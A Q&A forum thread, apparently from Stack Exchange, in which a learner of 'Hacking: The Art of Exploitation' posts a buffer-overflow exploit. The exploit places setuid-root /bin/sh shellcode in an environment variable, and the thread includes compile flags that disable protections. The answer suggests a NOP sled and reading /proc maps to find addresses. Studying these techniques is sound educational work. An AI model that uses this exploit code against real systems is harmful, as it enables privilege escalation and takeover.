Buffer overflow using environment variables

Question

I'm trying this code inspired by the "Hacking: The Art of Exploitation" book. It involves exploiting a buffer overflow using the environment variable. The exploitation code is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd"
"\x80";

int main(int argc, char *argv[]) {
  char *env[2] = {shellcode, 0};
  unsigned int i, ret;

  char *buffer = (char *)malloc(160);

  ret = 0xbffffffa - sizeof(shellcode) - strlen("./auth_overflow");

  for (i = 0; i < 160; i += 4)
    *((unsigned int *)(buffer + i)) = ret;

  execle("./auth_overflow", "auth_overflow", buffer, (char *)NULL, env);
  free(buffer);
}

The problem is the base address 0xbffffffa. I read here that the reason for this address is because "the Linux kernel is implemented like so". Still the exploit is not working and resulting in a segmentation fault.

I'm running Ubuntu 14.04 with Kernel version 3.13.0-83-generic on a 64-bit machine and I'm compiling the exploitation code using the following command:

gcc -m32 -fno-stack-protector -z execstack -g exploit.c -o exploit

I also disabled ASLR.

Any ideas on how to determine this based address?

Thanks for the help.

Answer 1

The idea with such exploitation is to use nop sled before your actual shellcode. That way, event if your address approximation is bad, there's more chance to hit nop, until your shellcode gets executed.

To get that address, you can cheat (for a start) looking at memory mappings in /proc/<<pid>>/maps.